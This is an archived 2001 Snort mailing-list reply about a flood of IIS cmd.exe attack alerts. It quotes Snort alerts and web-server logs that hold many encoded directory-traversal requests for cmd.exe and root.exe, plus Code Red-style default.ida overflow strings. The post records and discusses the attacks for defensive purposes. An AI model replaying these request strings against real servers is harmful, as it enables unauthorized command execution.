Snort mailing list archives
Re: WEB-IIS Cmd attack
From: Dr SuSE <drsuse () drsuse org>
Date: Tue, 18 Sep 2001 15:01:35 GMT
I saw the same thing this morning. Apparently Snort logged 1380 of these attacks.
Hi, Suddenly there is flood of Web-IIS CM attacks this is just a tiny bit of it, Is this a new variant or script kiddes around ? TIA Sep 18 16:50:14 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2031 -> 212.174.50.248:80
Sep 18 16:50:14 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2031 -> 212.174.50.248:80
Sep 18 16:50:15 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2109 -> 212.174.50.248:80
Sep 18 16:50:15 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2109 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2177 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2177 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2243 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2243 -> 212.174.50.248:80
Sep 18 16:50:17 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2294 -> 212.174.50.248:80
Sep 18 16:50:17 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2294 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2522 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2522 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2613 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2613 -> 212.174.50.248:80
Sep 18 16:50:19 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2673 -> 212.174.50.248:80
Sep 18 16:50:19 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2673 -> 212.174.50.248:80
Sep 18 16:50:20 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2726 -> 212.174.50.248:80
Sep 18 16:50:20 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2726 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2766 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2766 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3155 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3155 -> 212.174.50.248:80
Sep 18 16:50:25 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3216 -> 212.174.50.248:80
Sep 18 16:50:25 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3216 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3271 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3271 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
Sep 18 16:56:00 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:3992 -> 212.174.50.248:80
Sep 18 16:56:00 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:3992 -> 212.174.50.248:80
Sep 18 16:56:01 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4172 -> 212.174.50.248:80
Sep 18 16:56:01 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4172 -> 212.174.50.248:80
Sep 18 16:56:03 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4291 -> 212.174.50.248:80
Sep 18 16:56:03 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4291 -> 212.174.50.248:80
Sep 18 16:56:05 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4382 -> 212.174.50.248:80
Sep 18 16:56:05 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4382 -> 212.174.50.248:80
Sep 18 16:56:06 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4575 -> 212.174.50.248:80
Sep 18 16:56:06 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4575 -> 212.174.50.248:80
Sep 18 16:56:08 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4674 -> 212.174.50.248:80
Sep 18 16:56:08 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4674 -> 212.174.50.248:80
Sep 18 16:56:10 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4770 -> 212.174.50.248:80
Sep 18 16:56:10 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4770 -> 212.174.50.248:80
Sep 18 16:56:11 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4875 -> 212.174.50.248:80
Sep 18 16:56:11 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4875 -> 212.174.50.248:80
Sep 18 16:56:15 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1137 -> 212.174.50.248:80
Sep 18 16:56:15 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1137 -> 212.174.50.248:80
Sep 18 16:56:17 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1483 -> 212.174.50.248:80
Sep 18 16:56:17 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1483 -> 212.174.50.248:80
Sep 18 16:56:19 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1616 -> 212.174.50.248:80
Sep 18 16:56:19 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1616 -> 212.174.50.248:80
Sep 18 16:56:21 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1789 -> 212.174.50.248:80
Sep 18 16:56:21 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1789 -> 212.174.50.248:80
Sep 18 16:56:23 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:2014 -> 212.174.50.248:80
Sep 18 16:56:23 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:2014 -> 212.174.50.248:80
Sep 18 16:56:24 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:2099 -> 212.174.50.248:80
Sep 18 16:56:24 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:2099 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2606 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2606 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2649 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2649 -> 212.174.50.248:80
Sep 18 16:57:30 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2672 -> 212.174.50.248:80
Sep 18 16:57:30 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2672 -> 212.174.50.248:80
Sep 18 16:57:31 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2702 -> 212.174.50.248:80
Sep 18 16:57:31 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2702 -> 212.174.50.248:80
Sep 18 16:57:34 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2729 -> 212.174.50.248:80
Sep 18 16:57:34 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2729 -> 212.174.50.248:80
Sep 18 16:57:41 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3041 -> 212.174.50.248:80
Sep 18 16:57:41 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3041 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3202 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3202 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3379 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3379 -> 212.174.50.248:80
Sep 18 16:57:46 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3402 -> 212.174.50.248:80
Sep 18 16:57:46 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3402 -> 212.174.50.248:80
Sep 18 16:57:49 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3417 -> 212.174.50.248:80
Sep 18 16:57:49 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3417 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3594 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3594 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3617 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3617 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3638 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3638 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3661 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3661 -> 212.174.50.248:80
Sep 18 16:59:16 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.113.99:4917 -> 212.174.50.248:80
::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1% 1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.147.6%134595336 - - [18/Sep/2001:16:50:59 +0300] "GET
/default.ida? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66 - - [18/Sep/2001:16:55:56
+0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:55:58 +0300] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:00 +0300] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:01 +0300] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:03 +0300] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:05 +0300] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:06 +0300] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:08 +0300] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1% 1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:10 +0300] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:11 +0300] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:15 +0300] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:17 +0300] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:19 +0300] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:21 +0300] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:23 +0300] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:24 +0300] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34 - - [18/Sep/2001:16:57:24
+0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:25 +0300] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:29 +0300] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:29 +0300] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:30 +0300] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:31 +0300] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:34 +0300] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:41 +0300] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1% 1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:45 +0300] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:45 +0300] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:46 +0300] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:49 +0300] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:50 +0300] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:50 +0300] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:51 +0300] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:51 +0300] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.113.99 - - [18/Sep/2001:16:59:16 +0300] "GET
/default.ida? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 - "" ""
----- End forwarded message ----- -- Togan Muftuoglu _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
"Flush twice....it's a long way to afghanistan" --------------------------------------------- Microsoft ist nicht installiert. http://www.drsuse.org/ _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- WEB-IIS Cmd attack Togan Muftuoglu (Sep 18)
- Re: WEB-IIS Cmd attack R P G (Sep 18)
- Re: WEB-IIS Cmd attack cdowns (Sep 18)
- Re: WEB-IIS Cmd attack Togan Muftuoglu (Sep 18)
- Re: WEB-IIS Cmd attack Erek Adams (Sep 18)
- Re: WEB-IIS Cmd attack cdowns (Sep 18)
- Re: WEB-IIS Cmd attack John Sage (Sep 18)
- <Possible follow-ups>
- Re: WEB-IIS Cmd attack Dr SuSE (Sep 18)
- Re: WEB-IIS Cmd attack R P G (Sep 18)